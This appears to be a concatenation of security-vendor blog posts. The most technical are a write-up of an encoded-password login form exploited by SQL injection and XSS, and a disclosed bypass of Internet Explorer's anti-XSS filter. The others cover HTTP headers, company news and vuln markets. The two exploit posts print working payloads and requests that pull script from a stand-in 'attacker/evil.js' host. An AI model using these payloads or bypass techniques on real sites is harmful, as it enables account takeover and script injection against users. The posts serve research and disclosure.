The Insecurity of Security Through Obscurity

The topic of SQL Injection (SQLi) is well known to the security industry by now. From time to time, though, researchers come across a vector so unique that it must be shared. In my case I had this gibberish — &#MU4<4+0 — turn into an exploitable vector due to some unique coding done on the developers' end. So, as all stories go, let's start at the beginning.

When we come across a login form in a web application, there are a few go-to testing strategies. Of course, the first thing I did in this case was submit a login request with a username of admin and a password of ' OR 1=1--. To no one's surprise, the application responded with a message about incorrect information. However, the application did respond in an unusual way: the password field had ( QO!.>./* in it. My first thought was, "What is the slim chance they just returned the real admin password to me? It looks like it was randomly generated, at least." So, of course, I submitted another login attempt, this time using the newly obtained value as the password. This time I got a new value back on the failed login attempt: ) SL"+?+1'. Not surprisingly, they did not properly encode the HTML markup characters in this new response, so if we can figure out what is going on we can certainly get reflective Cross Site Scripting (XSS) on this login page. At this point it was time to take my research to a smaller scale and attempt to understand what was happening on a character-by-character level.

The next few login attempts were intended to scope out what was going on. By submitting three requests with a, b, and c, it might be possible to see a bigger picture starting to emerge. The response for each appeared to be the next letter in the alphabet — we got b, c, and d back in return. So as a next step, I tried to build on this knowledge: if we submit aa, we should expect to get bb back. Unfortunately, things are never just that easy. The application responded with b^ instead. So let's see what happens with a much larger string composed of the same letter; this time I submitted aaaaaaaaaaaa (that's 12 'a' characters in a row) and, to my surprise, got back b^c^b^b^c^b^. Now we have something to work with. Clearly some sort of pattern is emerging in how these characters are transformed — it looks like a repeating series, since the first 6 characters of the response are the same as the last 6.

So far we have only discussed these characters in their human readable format that you see on your keyboard. In the world of computers, they all have multiple secondary identities. One of the more common translations is their ASCII numerical equivalent. When a computer sees the letter ‘a’ the computer can also convert that character into a number, in this case 97. By giving these characters a number we may have an easier time determining what pattern is going on. These ASCII charts can be found all over the Internet and to give credit to the one I used, www.theasciicode.com.ar helped out big time here.

Since we have determined that the pattern repeats every 6 characters, let's figure out what this shift actually looks like numerically. We start off by injecting aaaaaa and, as expected, get back b^c^b^. But what does this look like if we use the ASCII numerical equivalents instead? In the computer's world we are injecting 97,97,97,97,97,97 and we get back 98,94,99,94,98,94. From this view it looks like each position has its own unique shift being applied to it. Surely everyone loved matrices as much as I did in math class, so let's bust out some of that old matrix subtraction: [97,97,97,97,97,97] – [98,94,99,94,98,94] = [-1,3,-2,3,-1,3]. Now we have a series that we can apply to the ASCII numerical equivalent of what we want to inject in order to get it to reflect how we want.
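The subtraction above can be sketched in a few lines of Python; this is a quick illustration of the derivation, not code from the target application:

```python
# Observed round trip: submitting 'aaaaaa' was reflected back as 'b^c^b^'.
submitted = "aaaaaa"
reflected = "b^c^b^"

# Per-position difference (input minus output), e.g. ord('a') == 97.
shifts = [ord(s) - ord(r) for s, r in zip(submitted, reflected)]
print(shifts)  # [-1, 3, -2, 3, -1, 3]
```

Applying this series to a desired injection pre-compensates for the server's transform, as the PoC below demonstrates.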

Finally, it's time to start forming a Proof of Concept (PoC) injection to exploit this potential XSS issue. So far we have found that a repeating pattern of 6 character shifts is being applied to our input, and we have determined the exact shift occurring at each position. If we apply the correct character shifts to an exploitable injection, such as "><img/src="h"onerror=alert(2)//, we would need to submit it as !A:llj.vpf<%g%mqduqrp@`odur+1,.2. Of course, seeing that alert box pop up was the visual verification needed that we had reverse engineered what was going on.
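As a sanity check, the shift series can be applied programmatically. This Python sketch (mine, not the application's code) reproduces the exact PoC string submitted above:

```python
# Input-minus-output series derived from the 'aaaaaa' -> 'b^c^b^' round trip.
SHIFTS = [-1, 3, -2, 3, -1, 3]

def encode(payload):
    """Pre-shift a desired injection so the application reflects it verbatim."""
    return "".join(
        chr(ord(ch) + SHIFTS[i % 6]) for i, ch in enumerate(payload)
    )

poc = encode('"><img/src="h"onerror=alert(2)//')
print(poc)  # !A:llj.vpf<%g%mqduqrp@`odur+1,.2
```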

Since we have a working PoC for XSS, let's revisit our initial testing for SQL injection. When we apply the same character shifts to ' OR 1=1--, we find that it needs to be submitted as &#MU4<4+0. One of the space characters in our injection is shifted by -1, which results in a non-printable character between the 'U' and the '4'. With the proper URL encoding applied, it appears as %26%23MU%1F4%3C4%2B0 when sent to the application. It was a glorious moment when I saw this application authenticate me as the admin user.
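The same encoder reproduces the SQL injection payload, including the hidden 0x1F byte, and Python's standard library handles the URL encoding:

```python
from urllib.parse import quote

# Input-minus-output series derived from the 'aaaaaa' -> 'b^c^b^' round trip.
SHIFTS = [-1, 3, -2, 3, -1, 3]

def encode(payload):
    """Pre-shift a desired injection so the application reflects it verbatim."""
    return "".join(chr(ord(ch) + SHIFTS[i % 6]) for i, ch in enumerate(payload))

raw = encode("' OR 1=1--")      # contains the non-printable 0x1F character
url_ready = quote(raw, safe="")
print(url_ready)  # %26%23MU%1F4%3C4%2B0
```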

Back in the early days of the Internet, well before I even started learning about information security, this type of attack was quite popular. These days, developers commonly use parameterized queries properly on login forms, so finding this type of issue has become quite rare. Unfortunately, this particular app was not created for the US market and was probably developed by very green coders in a newly developing country. This was their attempt at encoding users' passwords when we all know they should be hashed. Had this application not returned any content in the password field on failed login attempts, this SQL injection vulnerability would have remained perfectly hidden to any black box testing through this method. This highlights one of the many ways a vulnerability may exist but be obscured from those testing the application.

For those still following along, I have provided my interpretation of what the backend code may look like for this example. By flipping the + and – around, I could also use this same code to properly encode my injection so that it reflects the way I wanted it to:


<!DOCTYPE html>
<html>
<body>
<form name="login" action="#" method="post">
<?php
// Repeating six-character shift pattern applied to each password character
// (derived from the observed transforms, e.g. 'aaaaaa' becoming 'b^c^b^').
// Flip the signs and this same loop encodes an injection instead.
$shifts = array(1, -3, 2, -3, 1, -3);
$strinput = $_POST['password'];
$strarray = str_split($strinput);
for ($i = 0; $i < strlen($strinput); $i++) {
    $strarray[$i] = chr(ord($strarray[$i]) + $shifts[$i % 6]);
}
$password = implode($strarray);
echo "Login:<input type=\"text\" name=\"username\" value=\"" . htmlspecialchars($_POST['username']) . "\"><br>\n";
echo "Password:<input type=\"password\" name=\"password\" value=\"" . $password . "\"><br>\n";
// --- CODE SNIP ---
$examplesqlquery = "SELECT id FROM users WHERE username='" . addslashes($_POST['username']) . "' AND password='$password'";
// --- CODE SNIP ---
?>
<input type="submit" value="submit">
</form>
</body>
</html>

List of HTTP Response Headers

Every few months I find myself looking up the syntax of a relatively obscure HTTP header, and regularly I wonder why there isn't a good definitive list of common HTTP response headers anywhere. The lists on the Internet are usually missing half a dozen headers. So I've taken care to gather a list of all the HTTP response headers I could find. Hopefully this is useful to you, and removes some of the mystique behind how HTTP works if you've never seen headers before.

Note: this does not include things like IncapIP or other proxy/service-specific headers that aren't standard, nor does it include request headers.

Header Example Value Notes
Access-Control-Allow-Credentials true
Access-Control-Allow-Headers X-PINGOTHER
Access-Control-Allow-Methods PUT, DELETE, XMODIFY
Access-Control-Allow-Origin http://example.org
Access-Control-Expose-Headers X-My-Custom-Header, X-Another-Custom-Header
Access-Control-Max-Age 2520
Accept-Ranges bytes
Age 12
Allow GET, HEAD, POST, OPTIONS Commonly includes other things, like PROPFIND etc…
Alternate-Protocol 443:npn-spdy/2,443:npn-spdy/2
Cache-Control private, no-cache, must-revalidate
Client-Date Tue, 27 Jan 2009 18:17:30 GMT
Client-Peer 123.123.123.123:80
Client-Response-Num 1
Connection Keep-Alive
Content-Disposition attachment; filename="example.exe"
Content-Encoding gzip
Content-Language en
Content-Length 1329
Content-Location /index.htm
Content-MD5 Q2hlY2sgSW50ZWdyaXR5IQ==
Content-Range bytes 21010-47021/47022
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP default-src 'self' Different headers needed to control different browsers
Content-Security-Policy-Report-Only default-src 'self'; …; report-uri /csp_report_parser;
Content-Type text/html Can also include charset information (E.g.: text/html;charset=ISO-8859-1)
Date Fri, 22 Jan 2010 04:00:00 GMT
ETag "737060cd8c284d8af7ad3082f209582d"
Expires Mon, 26 Jul 1997 05:00:00 GMT
HTTP /1.1 401 Unauthorized Special header, no colon space delimiter
Keep-Alive timeout=3, max=87
Last-Modified Tue, 15 Nov 1994 12:45:26 +0000
Link <http://www.example.com/>; rel="canonical" Other relations (e.g. rel="alternate") are also common
Location http://www.example.com/
P3P policyref="http://www.example.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Pragma no-cache
Proxy-Authenticate Basic
Proxy-Connection Keep-Alive
Refresh 5; url=http://www.example.com/
Retry-After 120
Server Apache
Set-Cookie test=1; domain=example.com; path=/; expires=Tue, 01-Oct-2013 19:16:48 GMT Can also include the secure and HTTPOnly flag
Status 200 OK
Strict-Transport-Security max-age=16070400; includeSubDomains
Timing-Allow-Origin www.example.com
Trailer Max-Forwards
Transfer-Encoding chunked Valid values: chunked, compress, deflate, gzip, identity
Upgrade HTTP/2.0, SHTTP/1.3, IRC/6.9, RTA/x11
Vary *
Via 1.0 fred, 1.1 example.com (Apache/1.1)
Warning 199 Miscellaneous warning
WWW-Authenticate Basic
X-Aspnet-Version 2.0.50727
X-Content-Type-Options nosniff
X-Frame-Options deny
X-Permitted-Cross-Domain-Policies master-only Used by Adobe Flash
X-Pingback http://www.example.com/pingback/xmlrpc
X-Powered-By PHP/5.4.0
X-Robots-Tag noindex,nofollow
X-UA-Compatible Chrome=1
X-XSS-Protection 1; mode=block
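If you want to poke at headers like these programmatically, Python's standard library can parse a raw header block for you. The response below is a made-up example using values from the list:

```python
from email.parser import Parser

# A hypothetical raw header block, as received after the HTTP status line.
raw_headers = (
    "Cache-Control: private, no-cache, must-revalidate\r\n"
    "Content-Type: text/html;charset=ISO-8859-1\r\n"
    "X-Frame-Options: deny\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "\r\n"
)
parsed = Parser().parsestr(raw_headers)
for name, value in parsed.items():
    print(f"{name}: {value}")
```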

If I’ve missed any response headers, please let us know by leaving a comment and I’ll add it into the list. Perhaps at some point I’ll create a similar list for Request headers, if people find this helpful enough.

iCEO

As many of you know, I started WhiteHat Security more than 10 years ago with the mission to help secure the Web, company by company. It has been an incredible roller coaster ride over the past decade, both at WhiteHat Security, which has experienced phenomenal growth, and within the industry itself. By that I mean that we have come a long way: organizations and companies are now more aware of how critical their presence on the web is, and therefore how crucial it is that they ensure that presence is secure. I am proud to say that we now manage more than 30,000 websites, but with more than 900 million websites on the Internet today, we clearly still have a long way to go. And with that, I am pleased to announce that I have accepted the WhiteHat Security Board of Directors' invitation to step into the role of interim CEO of WhiteHat Security.

I am very proud of what this company has achieved since 2001: we have grown from a team of one to more than 350 passionate contributors in all areas of the business, including the world's largest army of hackers; we have received some of the highest industry accolades and awards out there; WhiteHat Sentinel is now a leading web application security solution for nearly 600 of the world's best-known brands; and we continue to experience exponential growth. All of this success is due in large part to the leadership and direction of our former CEO Stephanie Fohn, who took a leap of faith with us more than 8 years ago and who will remain one of the company's biggest supporters. I would be remiss if I did not acknowledge the work and dedication that she has put into this company, and I wish her the best as she takes time to be with family.

The Internet is a continuously evolving space. New websites launch every day and new threats emerge constantly. As such, web security is complex even for some of the most seasoned security practitioners. My focus will remain on ensuring that our customers – both current and future – have the best product and technology experience and that they get the highest levels of support that such a fast-paced market dictates. We will continue to lead on the fronts of innovation and customer success, and we will do that with a team of some of the most talented application security technologists, business executives, practitioners and contributors that this industry has to offer.

I look forward to leading WhiteHat Security into this next chapter.

Aviator Updates and Windows Alpha

Aside from the Windows version of Aviator, which is on the way (we get countless emails a day asking about it), we wanted to quickly update our users on what the latest versions of Aviator for Mac have fixed. Here is a list of the various fixes:

Aviator Release 1.4

  • This release contained crash fixes.
  • Links from emails or IMs, etc. will always be opened in protected mode.
  • Focus is set to the omni bar when opened in a new tab.

Aviator Release 1.5

  • This release contained a fix for an installation issue with AdBlock – an extension commonly requested by our users.

Aviator Release 1.6

  • This release updated Aviator to the latest version (31.0.1650.57) of Chromium at the date of release.

Aviator Release 1.7

  • This release contains a bugfix for the Application quit command not working.

The browser should have auto-updated, but if it didn't for some reason please download the latest version to get the fixes above. You can check your current version by going to “WhiteHat Aviator”->”About WhiteHat Aviator.” As we begin the countdown to the launch of the Windows Beta, we are opening our program to users who want to be added to the list of Alpha testers for Windows. The Alpha user program is expected to start around the second week of February. Please contact us if you're interested in joining the Aviator Alpha for Windows.

Challenging Security Assumptions in Open Source and Why it Matters

Guest post by G.S. McNamara

GS McNamara

Open source is great. Startups, non-profits, enterprises, and the government have all adopted open source software. Whitehouse.gov runs on a security-modified instance of Drupal, the free and open source content management framework. Another open source project, Apache Solr, is what powers search on whitehouse.gov. And finally, all of it runs on the LAMP solution stack. This is just one example of open source adoption by the federal government. Open source software is attractive in part because it can help the bottom line by avoiding vendor lock-in and leveraging the global community's effort in creating new features quickly.

But open source code that has been scrutinized by many must be secure, right? Sometimes, no. Do not skip the security assessment of a Web application simply because it is based on open source code. I am not talking about the introduction of insidious backdoors in the code, but about design decisions made in open source projects that have real security implications. Some of these design decisions can support really attractive features, but come with a hidden cost. Security concerns are not always highlighted in the documentation, and busy developers using open source code likely will not know about them. While application developers might be versed in secure development practices, they may make the assumption that so too are the developers contributing to the open source projects they build upon. Security weaknesses that make it past both sets of developers may later be discovered by the users of the application.

Thankfully there are tools and services that can be used to automatically scan your Web application and the libraries it uses for security vulnerabilities. An additional set of tools and services can be leveraged after the application is deemed functionally complete. I would suggest that open source developers clearly mark the security tradeoffs involved in design decisions, and match them up with a common terminology such as the Web Application Security Consortium's (WASC) Threat Classification to help developers building on their work understand the risk tradeoffs. If you are using open source, please evaluate your Web applications using a combination of static and dynamic analysis tools. Some tools can be used while still in development to avoid future, more costly surprises that require additional engineering to remediate. Some security tools are created for specific open source projects and frameworks, and are designed to be aware of security shortcomings within those projects and frameworks. Developers can use these tools while developing to be alerted to security issues as they are introduced into the application.

We are close, but we are not completely talking the same language when it comes to security. For instance, in my recent work on a pre-deployment security evaluation of a Ruby on Rails Web application, I found what can be categorized under WASC's Threat Classification as an Insufficient Session Expiration (WASC-41) weakness (PDF link) provided by the Rails framework itself. This weakness resides in the cookie-based session storage mechanism, CookieStore, which is both enabled by default and attractive for its performance benefits.
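Neither Rails' CookieStore internals nor Django's implementation are reproduced here; the following is a minimal, generic Python sketch of why any purely cookie-based session store has this property. The names and the signing scheme are illustrative only:

```python
import base64
import hashlib
import hmac
import json

SECRET = b"server-side-signing-key"  # illustrative secret

def sign_session(data):
    """Serialize and sign session state, as a cookie-based store does."""
    payload = base64.urlsafe_b64encode(json.dumps(data).encode()).decode()
    sig = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "." + sig

def load_session(cookie):
    """Accept any cookie with a valid signature -- there is no server-side state."""
    payload, sig = cookie.rsplit(".", 1)
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    return json.loads(base64.urlsafe_b64decode(payload))

captured = sign_session({"user_id": 42})
# "Logging out" only tells the browser to delete its copy; the server keeps
# no session table, so a previously captured cookie still verifies and loads.
assert load_session(captured) == {"user_id": 42}
```

Because validity rests entirely on the signature, a stolen or leaked cookie remains usable after logout unless the framework adds server-side revocation or expiry.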

In discussing this issue, which also exists in the popular Django framework, I realized there is also a semantic problem. This became evident during conversations with contributors to these open source projects. This session termination weakness does not fall under the examples given by the projects’ security guides of a replay attack or session hijacking. When replay attacks are mentioned in the documentation and elsewhere, the examples given are actions that can be taken (again) within an existing session on behalf of a user, such as re-purchasing a product from a shopping website. When “session hijacking” is discussed, talks concern stealing a user’s session while it is still active. The documentation does not talk about how the terminated session itself can be exhumed, which is the root issue I have worked to point out. Even a developer who has read the security guides for these projects would be blindsided by this nuance. More work is needed to better define vendor-neutral security weaknesses so their risks can be highlighted and managed appropriately regardless of the particular technology.

The bottom line is that you cannot trust that all eyes have vetted all security issues in the open source software your application is built on. Both applications and their components need to be tested by the developers for security flaws. Open source software design choices may have been made that are not secure enough for your environment, and the security tradeoffs of these choices may not even be mentioned in the project’s documentation. A huge benefit of open source software is that you can review the security of the code itself; take advantage of that opportunity to ensure you understand the risks that are present in your code.

About G.S.
G.S. McNamara is a senior technology and security consultant, and an intelligence technologies postgraduate based in the Washington, D.C. area. Formerly, he worked in a research and development lab on DARPA malware analysis and Web security programs. He began his career as an IT consultant to a K Street medical practice. He works with startups as well as on federal contracts building Web and mobile applications.

About our “Unsung Hero Program”
Every day app sec professionals tirelessly protect the Web, and we recognize that this is largely owed to a series of small victories. These represent untold stories. We want to help share your story. To learn more click here.

Why com.com Should Scare You

A long time ago I began to compile a list of lesser known but still very scary choke points on the Internet. This was a short list of providers (like the DNS 4.2.2.2 that most routers use, for instance) that could have major impact if they were ever compromised or owned by a nefarious 3rd party. One of those was com.com.

Com.com is the single best typosquatting domain on the planet. Let's say, for instance, you accidentally type in user@yahoo.com.com (notice the end there). Yes, it would go to com.com email servers if they were set up to allow email to come in. If you typed a URL as http://www.yahoo.com.com, you would similarly be redirected to the typo domain. Or how about phishing sites at ebay.com.com? Have you downloaded the latest patch from microsoft.com.com? Given that .com is the largest TLD, com.com is naturally the best typo domain.

A few months ago, and without much fanfare, com.com was silently sold by CNET to DSparking.com – one of the most notorious domain squatters ever. Sources close to the deal told me it was sold for around $1.5 million. Yes, the fox owns the hen-house. For $1.5 million it was a steal though – it's easily worth that just in typo traffic and the huge volume of accidental inbound links.

However, things are not as bad as they could be. For instance, port 80 (web) is open, but port 25 (mail) is not. If and when DSparking decides to open port 25, they will start receiving tons of email that is potentially extremely sensitive. Even if mail appears to be rejected by their servers, they could still be logging it.

For now mail appears to be closed and has been since the deal went through. They could easily be opening port 25 only to selective IP address ranges, or even opening and closing it periodically to get a snapshot of traffic. There’s no easy way to know for sure. I doubt it’s open at all but should that change, and it could easily, this should be considered an extremely dangerous domain.

Correction:
As @spazef0rze pointed out, although port 25 is closed on the web server, mail is still being processed through a separate DNS entry:

$ host -t MX yahoo.com.com
yahoo.com.com mail is handled by 10 mx.b-io.co.

Also, as @mubix noted, there are many other ports/protocols that can be subject to interception if typo’d in the same way. So yes, it’s probably time to block this. No good can come of it.

Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter

There’s a problem with the reflective Cross Site Scripting ("XSS") filter in Microsoft’s Internet Explorer family of browsers that extends from version 8.0 (where the filter first debuted) through the most current version, 11.0, released in mid-October for Windows 8.1, and early November for Windows 7.

In the simplest possible terms, the problem is that the anti-XSS filter only compares the untrusted request from the user and the response body from the website for reflections that could cause immediate JavaScript or VBScript code execution. Should an injection from that initial request reflect on the page but not cause immediate JavaScript code execution, the untrusted data from the injection is then marked as trusted data, and the anti-XSS filter will not check it in future requests.

To reiterate: Internet Explorer’s anti-XSS filter divides the data it sees into two categories: untrusted and trusted. Untrusted data is subject to the anti-XSS filter, while trusted data is not.

As an example, let’s suppose a website contains an iframe definition where an injection on the "xss" parameter reflects in the src="" attribute. The page referenced in the src="" attribute contains an XSS vulnerability such that:

GET http://vulnerable-iframe/inject?xss=%3Ctest-injection%3E

results in the “xss” parameter being reflected in the page containing the iframe as:

<iframe src="http://vulnerable-page/?vulnparam=<test-injection>"></iframe>

and the vulnerable page would then render as:

Some text <test-injection> some more text

Should a user make a request directly to the vulnerable page in an attempt to reflect <script src=http://attacker/evil.js></script> as follows:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter sees that the injection would result in immediate JavaScript code execution and subsequently modifies the response body to prevent that from occurring.

Even when the request is made to the page containing the iframe as follows:

GET http://vulnerable-iframe/inject?xss=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

and Internet Explorer’s anti-XSS filter sees it reflected as:

<iframe src="http://vulnerable-page/?vulnparam=<script src=http://attacker/evil.js></script>"></iframe>

which, because it looks like it might cause immediate JavaScript code execution, will also be altered.

To get around the anti-XSS filter in Internet Explorer, an attacker can make use of sections of the HTML standard: Decimal encodings and Hexadecimal encodings.

Hexadecimal encodings were made part of the official HTML standard in 1998 as part of HTML 4.0 (3.2.3: Character references), while Decimal encodings go back further to the first official HTML standard in HTML 2.0 in 1995 (ISO Latin 1 Character Set). When a browser sees a properly encoded decimal or hexadecimal character in the response body of a HTTP request, the browser will automatically decode and display for the user the character referenced by the encoding.

As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character.

Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.
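You can see the browser's side of this with Python's html module, which performs the same numeric character-reference decoding. The two strings are the attribute values from the examples below:

```python
from html import unescape

# The partially decimal-encoded and partially hex-encoded injections,
# as they land in the iframe's src attribute.
decimal_form = ("<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://"
                "a&#116;ta&#99;ker/evil.js></s&#99;&#114;i&#112;t>")
hex_form = ("<s&#x63;ri&#x70;t s&#x72;c=http://"
            "atta&#x63;ker/evil.js></s&#x63;ri&#x70;t>")

# Both decode to the same immediately-executable markup.
print(unescape(decimal_form))  # <script src=http://attacker/evil.js></script>
print(unescape(hex_form))      # <script src=http://attacker/evil.js></script>
```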

To return to the iframe example, instead of the obviously malicious injection, a slightly modified injection will be used:

Partial Decimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fa%26%23116%3Bta%26%2399%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://a&#116;ta&#99;ker/evil.js></s&#99;&#114;i&#112;t>"></iframe>

or

Partial Hexadecimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fatta%26%23x63%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#x63;ri&#x70;t s&#x72;c=http://atta&#x63;ker/evil.js></s&#x63;ri&#x70;t>"></iframe>

Internet Explorer’s anti-XSS filter does not see either of those injections as potentially malicious, and the reflections of the untrusted data in the initial request are marked as trusted data and will not be subject to future filtering.

The browser, however, sees those injections, and will decode them before including them in the automatically generated request for the vulnerable page. So when the following request is made from the iframe definition:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter will ignore the request completely, allowing it to reflect on the vulnerable page as:

Some text <script src=http://attacker/evil.js></script> some more text

Unfortunately (or fortunately, depending on your point of view), this methodology is not limited to iframes. Any place where an injection lands in the attribute space of an HTML element, which is then relayed onto a vulnerable page on the same domain, can be used. Form submissions where the injection reflects either inside the "action" attribute of the form element or in the "value" attribute of an input element are two other instances that may be used in the same manner as with the iframe example above.

Beyond that, in cases where there is only the single page where:

GET http://vulnerable-page/?xss=%3Ctest-injection%3E

reflects as:

Some text <test-injection> some more text

the often under-appreciated sibling of Cross Site Scripting, Content Spoofing, can be utilized to perform the same attack. In this example, an attacker would craft a link that would reflect on the page as:

Some text <div style=some-css-elements><a href=?xss=&#x3C;s&#x63;ri&#x70;t&#x20;s&#x72;c&#x3D;htt&#x70;://atta&#x63;ker/evil.js&#x3E;&#x3C;/s&#x63;ri&#x70;t&#x3E;>Requested page has moved here</a></div> some more text

Then when the victim clicks the link, the same page is called, but now with the injection being fully decoded:

Some text <script src=http://attacker/evil.js></script> some more text

This is the flaw in Internet Explorer’s anti-XSS filter. It only looks for injections that might immediately result in JavaScript code execution. Should an attacker find a way to relay the injection within the same domain — be it by frames/iframes, form submissions, embedded links, or some other method — the untrusted data injected in the initial request will be treated as trusted data in subsequent requests, completely bypassing Internet Explorer’s anti-Cross Site Scripting filter.

Afterword:

After Microsoft made its decision not to work on a fix for this issue, it was requested that the following link to their design philosophy blog post be included in any public disclosures that may occur. In particular the third category, which discusses "application-specific transformations" and the possibility of an application that would "ROT13 decode" values before reflecting them, was pointed to in Microsoft’s decision to allow this flaw to continue to exist.

http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

The "ROT13 decode" and "application-specific transformations" mentions do not apply. Everything noted above is part of the official HTML standard, and has been so since at least 1998 — if not earlier. There is no "only appears in this one type of application" functionality being used. The XSS injection reflects in the attribute space of an element and is then relayed onto a vulnerable page (either another page, or back to itself) where it then executes.

Additionally, the usage of decimal and hexadecimal encodings is not the flaw; they are merely two implementations of the method that exploits the flaw. Often simple URL/URI encodings (mentioned as early as 1994 in RFC 1630) can be used in their place.

The flaw with Internet Explorer’s anti-XSS filter is that injected untrusted data can be turned into trusted data and that injected trusted data is not subject to validation by Internet Explorer’s anti-XSS filter.

Post Script:

The author has adapted this post from his original work, which can be found here:

http://rtwaysea.net/blog/blog-2013-10-18-long.html

Aviator 1.2 Beta Released

A few weeks have passed and we've had an overwhelmingly positive response from the community to the Aviator Beta. As you can probably expect, the vast majority of comments we received were about building a Windows version or a Linux version. But in the meantime, we wanted to make sure we continued iterating on some of the bugs that have been reported. Aviator version 1.2 has the following changes:

  • Fixed gate keeper – unidentified developer code signing issue
  • Fixed crash issue with Mac version 10.6
  • Fixed plugins installation issue (correcting an error in the User Agent)
  • Fixed broken images while adding new user in settings page
  • Fixed typo issue in the Protected mode message popup
  • Permissions fixed to be safer and less permissive

If you already have Aviator, it should automatically update. If you don’t, please feel free to download Aviator here.

We’re committed to fixing the remaining issues, and iterating. As we decide how to move forward we encourage everyone to continue to send us bug reports and tell us what you think, what you’d like to see, and how we can improve. You can reach us through one of our emails. Together we’ll make the web a more private place, one browser at a time!

Blindspot – Target Fixation

This is part two of a series of posts about blindspots that I discussed during my LASCON keynote presentation this year. To see the first post about network and host security blindspots, click here.

One thing I have come to notice is that there is a strange tendency in our industry to focus on specific things, just because that’s what’s interesting to us. I definitely encourage enthusiasm, but not when it comes with a blindspot towards other vulns. For instance, one exercise I regularly ask people to do is to give me an off-the-cuff DREAD severity rating for a vuln that they are currently excited about. They start by saying, “It’s horrible” – a very strong word that would typically suggest a high severity rating. However, after performing a DREAD analysis by hand, the rating almost always ends up significantly lower than the person instinctively felt.
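For readers unfamiliar with the model, a back-of-the-envelope DREAD score is just the average of five categories, each rated 0 to 10. A quick sketch (the example ratings below are made up, not from any real vuln):

```php
<?php
// DREAD: rate each category 0-10, then average.
// These particular numbers are illustrative only.
$scores = array(
    'Damage'          => 7,
    'Reproducibility' => 5,
    'Exploitability'  => 4,
    'Affected users'  => 6,
    'Discoverability' => 8,
);

$severity = array_sum($scores) / count($scores);
echo $severity; // 6
```

Working through the five numbers one at a time is exactly what deflates the initial “it’s horrible” reaction.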

Likewise, I see a strange blindspot in the industry around the buying of vulns. I ran an experiment and attempted to sell a half dozen vulns (mostly medium to high severity) and was surprised to find that there were no buyers. Let me show you why that’s odd. A buffer overflow in some DNS server might give an attacker user-level access to a machine, and that might be worth, say, $100k on the vuln markets. Some of the exploits I discovered would allow an attacker to get a shell on the box in the “www” user context. So both vulns are almost equivalent, with the exception of the method of propagation (remote unauthenticated vs CSRF). One is worth $100k and the other is worth $0. Seem odd? Let’s dig in a bit deeper.

I began asking my friends in the underground what a compromised webserver is worth to them. They said somewhere around $500 for what they were doing with it. So if my exploit allowed them to compromise 2,000 CMSs (which it could rather easily) it would be a $1 million pay day for their group. I confirmed with them that even an attack using CSRF would still be easy to monetize – so even the method of propagation wasn’t an issue. There’s a blindspot here. If the security industry is not willing to pay a dime, but attackers are valuing it at $1 million, that’s a discrepancy that makes it extremely difficult to stay on the right side of the law.

I think the problem has always been a misperception in our industry of the importance of what we think is cool or intellectually interesting versus what attackers think is useful and can be leveraged to make money. Admittedly, vuln purchase programs all come down to a supply and demand issue. However, since there is still no easy outlet for webappsec vuln research even after all these years, things will continue to stay bad for a very long time. I predict this problem won’t go away any time in the near future, not until all vulns are purchased on an equal playing field, using DREAD or something similar. For now though, expect your CMSs to stay vulnerable, unless you’re being extremely proactive.

The point is, I encourage you not to focus too much on one target, one vuln, or one vuln class, when there are others with the potential to do equal or greater damage, or that are easier to exploit. Just because it’s interesting to us as security researchers doesn’t mean attackers see it the same way.

Announcing Support for PHP in WhiteHat Sentinel Source

It is with great pleasure that I formally announce support for the PHP programming language in WhiteHat Sentinel Source! Joining Java and C#, PHP is now a member of the family of languages supported by our static code analysis technology. Effective immediately, our users have the ability to schedule static analysis scans of web applications developed in PHP for security vulnerabilities. Accurately and efficiently supporting the PHP language was a tremendous engineering effort, and a great reflection upon our Engine and Research and Development teams.

Static code analysis for security of the PHP programming language is nothing new. There are open source and commercial vendors that already claim support for this language, and have done so for quite some time now. So what’s so special about the support for PHP in WhiteHat Sentinel Source? The answer centers on our advances in the ability of static analysis to model and simulate the execution of PHP accurately. Almost every other PHP static code analysis offering is limited by the fact that it cannot overcome the unique challenges presented by dynamic programming languages, such as dynamic typing. Without the ability to accurately model the type information associated with expressions and statements, for example, users were unable to correctly capture the rules needed to identify security vulnerabilities. WhiteHat Sentinel Source’s PHP offering ships with a highly tuned type inference system that piggy-backs off our patented Runtime Simulation algorithm to provide much deeper insight into source code – thereby overcoming the limitations of previous technologies.

Here is a classic PHP vulnerability that most, if not all, static code analysis tools should identify as a Cross-Site Scripting vulnerability:


$unsafe_variable = $_GET['user_input']; // source: untrusted request data

echo "You searched for:<strong>".$unsafe_variable."</strong>"; // sink: unescaped output

